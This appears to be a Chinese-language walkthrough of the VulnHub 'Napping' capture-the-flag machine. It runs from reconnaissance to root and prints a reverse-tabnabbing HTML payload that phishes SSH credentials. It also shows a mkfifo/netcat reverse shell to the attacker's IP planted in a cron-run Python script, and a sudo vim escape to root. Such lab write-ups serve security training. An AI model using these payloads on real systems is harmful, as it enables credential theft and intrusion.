一、下載靶機

下載地址：https://download.vulnhub.com/napping/napping-1.0.1.ova

下載好后使用VM打開，將網絡配置模式改為net，防止橋接其他主機干擾（橋接Mac地址也可確定主機）。

二、發現主機

使用nmap掃描沒有相應的ip，可能是靶機網卡接口有問題，去更改配置。

nmap -O 192.168.29.1/24

修改虛擬機網卡接口配置，在剛剛啟動虛擬機的時候按住shift鍵，出現類似下圖界面。

按e鍵進入修改界面找到 ro ******** 這一部分，直接在后面添加 rw single init=/bin/bash 。

rw single init=/bin/bash

修改完后 Ctrl + X 進入bash shell 界面，輸入ip a 查看網卡ens33。

ip a

修改網絡配置文件/etc/netplan目錄下的yaml文件。將里面的內容修改為下圖所示。然后重啟虛擬機。

vi /etc/network/interfaces

這時候再去掃描，可以找到我們靶機的地址：192.168.29.134

三、端口掃描

使用nmap詳細掃描全部端口,開啟了22、80端口。

nmap -A -p- 192.168.29.134

四、目錄掃描

使用下列命令探測出目錄后，再看看一些敏感目錄等，把所有的目錄找全。

gobuster dir -u http://192.168.29.134/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

五、web滲透

訪問上述出來的目錄，找我們的攻擊點。我們能夠訪問的只有這些。

對登錄框進行各種漏洞測試發現沒有什么可以利用的點，所以我們直接注冊賬號，登錄進去看看有沒有什么可以利用的。

密碼要是六位以上的，登錄進去可以看到是一個這樣的界面

網頁有個插入URL的輸入框，我們查看源代碼看看邏輯，可以發現這里會顯示我們輸入的URL，可以嘗試使用釣魚查看他的用戶和密碼。

kali在網站絕對路徑建立文件，測試是否可以進行正常訪問。

根據頁面回顯是可以正常訪問的，那么接下來構造我們自己的釣魚代碼。這里面的網址為另一個網址，不是本文件地址。

<!DOCTYPE html>
<html>
<body><script>if(window.opener) window.opener.parent.location.replace('http://192.168.29.128:8888/2.html');if(window.opener  != window) window.opener.parent.location.replace('http://192.168.29.128:8888/2.html');</script>
</body>
</html>

打開監聽，將我們kali文件的訪問地址輸入到輸入框中，打開稍等一會就可以得到我們需要的ssh賬號密碼了。

nc -lvp 8888

將我們得到的信息URL解碼一下得到用戶名和密碼，使用ssh進行連接。

連接成功后我們查看當前所在用戶的權限，看看能執行什么命令。

whoami
id
find / -group administrators 2>/dev/null

當前用戶權限很低，只有一個python文件可以執行，查看該文件內容。

cat /home/adrian/query.py

根據py文件內信息可以知道他會往site_status.txt文件內寫入東西。查看該文件。

該文件每兩分鐘寫一條消息。

cat /home/adrian/site_status.txt

根據定時文件的執行我們可以寫一個反彈shell的命令在里面，在兩分鐘后文件執行的時候我們的反彈shell命令也會一起被執行。打開監聽并將下列命令加到py文件里。

nc -lvp 6666

import os
os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.29.128 6666 >/tmp/f")

得到的反彈shell被賦予了vim權限，使用vim提權

sudo vim -c ':!/bin/bash'

提權成功。

完結撒花??ヽ(°▽°)ノ?